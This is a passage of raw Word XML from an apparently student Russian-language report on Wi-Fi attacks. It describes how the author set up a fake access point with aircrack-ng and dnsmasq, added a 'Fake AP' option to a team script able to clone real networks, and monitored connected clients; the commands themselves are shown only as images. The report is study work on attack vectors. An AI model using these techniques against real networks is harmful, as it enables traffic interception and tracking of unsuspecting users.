      <w:r w:rsidR="000658ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ng</w:t>
      </w:r>
      <w:r w:rsidR="000658ED">
        <w:t>, чтобы просканировать текущие точки доступа и скопировать их названия (подробнее в другом отчёте).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143ACB99" w14:textId="16DC6F21" w:rsidR="00BF7BC9" w:rsidRDefault="00BF7BC9" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF7BC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">параметр задаёт </w:t>
      </w:r>
      <w:r w:rsidR="00F72E10">
        <w:t>канал,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на котором будет работать фейковая точка</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF7BC9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0799E049" w14:textId="21A00D85" w:rsidR="00BF7BC9" w:rsidRDefault="007C75BD" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Wlan0 </w:t>
      </w:r>
      <w:r>
        <w:t>означает беспроводной интерфейс.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14337A91" w14:textId="219CCC34" w:rsidR="00F72E10" w:rsidRDefault="000D71EC" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Теперь осталось запустить и настроить интерфейс</w:t>
      </w:r>
      <w:r w:rsidR="008B1C84" w:rsidRPr="008B1C84">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008B1C84">
        <w:t>на котором работает фейковая точка. Для этого вводим следующие команды</w:t>
      </w:r>
      <w:r w:rsidR="008B1C84">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1752B93D" w14:textId="1BE99754" w:rsidR="008B1C84" w:rsidRDefault="007A6CA8" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79DD83BF" wp14:editId="421432B1">
            <wp:extent cx="5638800" cy="2371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2371725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5F41FC" w14:textId="4DDBED11" w:rsidR="007A6CA8" w:rsidRDefault="000E3C22" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Данные команды задают адрес для интерфейса </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:r w:rsidRPr="000E3C22">
        <w:t xml:space="preserve">0, </w:t>
      </w:r>
      <w:r>
        <w:t>статические маршшруты и параметры для маршрутизации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09227368" w14:textId="1A90A73A" w:rsidR="00F3737A" w:rsidRDefault="00B52A5F" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Остаётся запустить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dnsmasq</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52A5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>вместе с описанной ранее конфигурацией</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52A5F">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6C1D7C" w14:textId="3F9BABBC" w:rsidR="000C36E8" w:rsidRDefault="000C36E8" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70C40D75" wp14:editId="1A5EBD95">
            <wp:extent cx="5940425" cy="1820545"/>
            <wp:effectExtent l="0" t="0" r="317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820545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52182463" w14:textId="785E9C19" w:rsidR="000C36E8" w:rsidRDefault="00C713FB" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Теперь запуск фейковой точки завершён. Если какой-то клиент присоединится к нашей </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AP</w:t>
      </w:r>
      <w:r w:rsidRPr="00C713FB">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>то мы сможем мониторить его действия в терминале</w:t>
      </w:r>
      <w:r w:rsidRPr="00C713FB">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60975CD2" w14:textId="599B31AE" w:rsidR="00263E2A" w:rsidRDefault="00263E2A" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C539908" wp14:editId="1DB8E7A4">
            <wp:extent cx="4838700" cy="350665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292" cy="3509981"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CDB568" w14:textId="7CECE37F" w:rsidR="00263E2A" w:rsidRDefault="00ED306C" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для более удобного использования </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aircrack</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED306C">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ng</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED306C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>нами был создан скрипт со следующим интерфейсом</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED306C">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E06E2F" w14:textId="10819C3A" w:rsidR="00ED306C" w:rsidRDefault="00F0269F" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="646BC9B2" wp14:editId="012A5756">
            <wp:extent cx="5940425" cy="1445351"/>
            <wp:effectExtent l="0" t="0" r="3175"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445351"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57531A36" w14:textId="2559AB99" w:rsidR="00F0269F" w:rsidRDefault="00F0269F" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F3342B1" wp14:editId="4C92587E">
            <wp:extent cx="4238625" cy="1628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1628775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C18CD8B" w14:textId="002F4FB8" w:rsidR="00F0269F" w:rsidRDefault="008D095A" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В мои задачи входило </w:t>
      </w:r>
      <w:r w:rsidR="0005278B">
        <w:t xml:space="preserve">присоединить к этому скрипту создание </w:t>
      </w:r>
      <w:r w:rsidR="0005278B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fake</w:t>
      </w:r>
      <w:r w:rsidR="0005278B" w:rsidRPr="0005278B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0005278B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AP</w:t>
      </w:r>
      <w:r w:rsidR="0005278B" w:rsidRPr="0005278B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0005278B">
        <w:t>упрощённым способом (опция 3 на скриншоте выше).</w:t>
      </w:r>
      <w:r w:rsidR="00691AC1">
        <w:t xml:space="preserve"> В скрипт были добавлены мной все команды, которые были показаны выше</w:t>
      </w:r>
      <w:r w:rsidR="004059FC">
        <w:t xml:space="preserve"> (см. Приложение 1 </w:t>
      </w:r>
      <w:r w:rsidR="004059FC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidR="004059FC" w:rsidRPr="00950AE1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004059FC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>option</w:t>
      </w:r>
      <w:r w:rsidR="004059FC" w:rsidRPr="00950AE1">
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:r w:rsidR="004059FC">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="004059FC" w:rsidRPr="00950AE1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00950AE1">
        <w:t xml:space="preserve"> После нажатия 3 клавиш</w:t>
      </w:r>
      <w:r w:rsidR="007D24B0">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00950AE1">
        <w:t>, можно поочерёдно задавать необходимые параметры как показано ниже</w:t>
      </w:r>
      <w:r w:rsidR="00950AE1" w:rsidRPr="00950AE1">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38700520" w14:textId="3601720B" w:rsidR="003700FD" w:rsidRDefault="003700FD" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AE764B7" wp14:editId="2A0FAA35">
            <wp:extent cx="4638675" cy="26193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2619375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7080F213" w14:textId="7F1FF9C4" w:rsidR="003700FD" w:rsidRDefault="00AE2507" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">И в самом конце создастся фейковая точка и автоматически запуститься </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dnsmasq</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2507">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BDD1DD" w14:textId="2CC86206" w:rsidR="00AE2507" w:rsidRDefault="004679B1" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B0A94E1" wp14:editId="178D8F8A">
            <wp:extent cx="5940425" cy="2456789"/>
            <wp:effectExtent l="0" t="0" r="3175"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456789"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E653F32" w14:textId="7EFA7A18" w:rsidR="004679B1" w:rsidRPr="005460CC" w:rsidRDefault="005460CC" w:rsidP="00C0341F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Таким образом можно создавать фейковые </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AP</w:t>
      </w:r>
      <w:r w:rsidRPr="005460CC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>с любыми параметрами и, в том числе, с параметрами позволяющими полностью скопировать существующую точку доступа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFC8EF2" w14:textId="77777777" w:rsidR="00752B7C" w:rsidRPr="00752B7C" w:rsidRDefault="00752B7C" w:rsidP="00752B7C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FBEEA3F" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:before="57" w:after="57" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A2D3C2B" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB333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446A09D3" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3307B314" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_heading=h.2et92p0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="11" w:name="_Toc75213388"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Заключение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="496DCE6C" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:before="57" w:after="57"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работы поставленная нами цель была достигнута. Реализованное программное обеспечение позволяет перехватывать, анализировать трафик, проводить соответствующие атаки, подменять точки доступа и отключать пользователей от них. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1494DC01" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:before="57" w:after="57"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Потенциальная опасность такого рода программного обеспечения достаточно велика, однако его наглядная реализация позволяет глубже понять возможные векторы планирования злоумышленника и в случае необходимости действовать на предупреждение возможного вреда. Все перехваченные в процессе работы данные принадлежат нам и носят лишь информативный характер. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC8D2E1" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:before="57" w:after="57" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Одним из возможных способов применения системы мониторинга Probe Request запросов является отслеживание активности пользователей в определенных местах. Это может быть полезно как рекламным </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>компаниям</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> для обработки результатов и предоставления более актуальной в соответствии с интересами пользователя рекламы, так и в других отраслях, отслеживающих перемещение пользователей (к примеру, криминалистика).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4EC447" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CC96A8" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_heading=h.tyjcwt" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="13" w:name="_Toc75213389"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Литература</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="77BC9414" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">How we tracked and analyzed over 200,000 people`s footsteps at MIT. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[Электронный ресурс]. – Электрон</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дан. – Режим доступа: </w:t>
      </w:r>
      <w:hyperlink r:id="rId20">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.freecodecamp.org/news/tracking-analyzing-over-200-000-peoples-every-step-at-mit-e736a507ddbf/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1889B66F" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The Perils of Probe Requests. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[Электронный ресурс]. – Электрон</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дан. – Режим доступа: </w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://medium.com/@brannondorsey/wi-fi-is-broken-3f6054210fa5</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76287AD7" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="3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CWAP 802.11- Probe Request/Response. [Электронный ресурс]. – Электрон</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дан. – Режим </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://mrncciew.com/2014/10/27/cwap-802-11-probe-requestresponse/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="09FD84FE" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="3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Airmon-ng. [Электронный ресурс]. – Электрон</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дан. – Режим доступа: </w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.aircrack-ng.org/doku.php?id=airmon-ng</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5DE3B38D" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Counting wireless devices on a Raspberry Pi with tcpdump. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
